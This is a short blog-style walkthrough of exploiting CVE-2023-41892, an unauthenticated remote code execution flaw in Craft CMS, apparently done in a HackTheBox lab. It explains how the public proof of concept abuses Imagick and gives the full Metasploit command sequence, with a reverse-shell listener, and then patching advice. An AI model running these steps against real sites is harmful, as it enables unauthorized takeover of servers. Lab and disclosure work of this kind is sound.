Craft CMS CVE-2023–41892 Vulnerability Exploitation | POC
We covered the CVE-2023–41892 proof of concept that affected Craft CMS manually and with Metasploit framework. CVE-2023–41892 is a security vulnerability discovered in Craft CMS, a popular content management system.
Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.
Full blog post is here.
What is Craft CMS?
Craft CMS is a Content Management System that is easy and clear. It offers every mechanism needed to do the everyday chores needed for a functional website. Content integration is going to be hassle-free, no doubt.
The version of the Craft CMS is vulnerable to CVE-2023–41892 with this POC available publicly.
Like other content management systems, Craft CMS has a not very large pre-auth attack surface. However, the beforeAction method of the \craft\controllers\ConditionsController class could let an attacker to produce any object.
The vulnerability affects Craft CMS version 4.0.0-RC1 through 4.4.14.
Understanding The Exploit
- The
getTmpUploadDirAndDocumentRoot()
allows you to executephpinfo
which reads the main web root in addition to the upload directory. - The
writePayloadToTempFile(documentRoot)
function yieldsHTTP 502
HTTP error indicating successful exploit. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension. - The
trigerImagick(tmpDir)
function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.
Some people reported problems running the exploit so if this happened with you, you can then try this exploit or follow the Metasploit method outlined below.
Craft CMS Vulnerability Exploitation with Metasploit
sudo msfconsole
Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run
And it should be done and you can move on to post exploitation and privilege escalation phase.
Mitigation and Patching
The vulnerability can be fixed by upgrading to Craft CMS version 4.4.15 or higher.
Users can take the subsequent steps to lessen and mitigate the vulnerability y following below method:
Should your security key have been hacked, update it. Running the php craft setup/security-key command and transferring the modified CRAFT_SECURITY_KEY environment variable to all production environments will accomplish that.